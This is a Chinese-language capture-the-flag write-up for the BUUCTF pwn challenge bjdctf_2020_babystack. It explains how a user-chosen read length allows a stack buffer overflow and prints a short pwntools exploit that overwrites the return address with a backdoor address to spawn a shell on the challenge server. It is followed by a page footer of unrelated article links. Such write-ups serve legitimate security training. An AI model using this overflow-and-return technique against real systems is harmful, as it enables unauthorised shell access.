[BUUCTF]PWN18——bjdctf_2020_babystack

附件

步骤:
例行检查,64位,开启了nx保护

试运行一下程序

大概了解程序的执行过程后用64位ida打开,shift+f12先查看一下程序里的字符串

看到/bin/sh双击跟进,ctrl+x找到了后门函数,shell_addr=0x4006e6

根据试运行的回显,找到了输入点

一个简单的小程序,buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出

EXP

from pwn import*

r=remote('node3.buuoj.cn',28532)

shell_addr=0x4006e6

r.sendline('100')

payload='a'*(0x10+8)+p64(shell_addr)

r.sendline(payload)

r.interactive()

最新文章

  1. CommandPattern
  2. Elasticsearch 5.0 —— Head插件部署指南
  3. ZABBIX冗余架构构筑(Centos6.4+pacemaker+corosync+drbd)
  4. 【BZOJ-1974】auction代码拍卖会 DP + 排列组合
  5. Selenium_Selenium WebDriver 中鼠标和键盘事件分析及扩展
  6. java关于StringBuffer和StringBuilder写入文件的效率问题
  7. 数据分析学习(zhuan)
  8. AMQ学习笔记 - 01. 相关背景
  9. 前端笔记——获取url里面的参数值
  10. hdu 2032
  11. js之with
  12. 9.Spark Streaming
  13. Day12 前端html
  14. 微信支付异常:appid and openid not match
  15. CodeForces - 375A Divisible by Seven(数学)
  16. IoC之AutoFac(三)——生命周期
  17. angular2-4 之动效-animation
  18. SpringBoot Web开发(5) 开发页面国际化+登录拦截
  19. Linux salt
  20. flow ci的构建

热门文章

  1. printf("%d\n",printf("%d",printf("%d",i)));
  2. 🏆【Alibaba中间件技术系列】「RocketMQ技术专题」让我们一起探索一下DefaultMQPushConsumer的实现原理及源码分析
  3. 洛谷 P3600 - 随机数生成器(期望 dp)
  4. R语言与医学统计图形-【10】ggplot2图形映射
  5. Mysql-多个left join 计算逻辑
  6. 09 eclipse配置maven环境
  7. Python中的随机采样和概率分布(一)
  8. JVM2 类加载子系统
  9. 基于MQTT协议实现远程控制的"智能"车
  10. day15 数组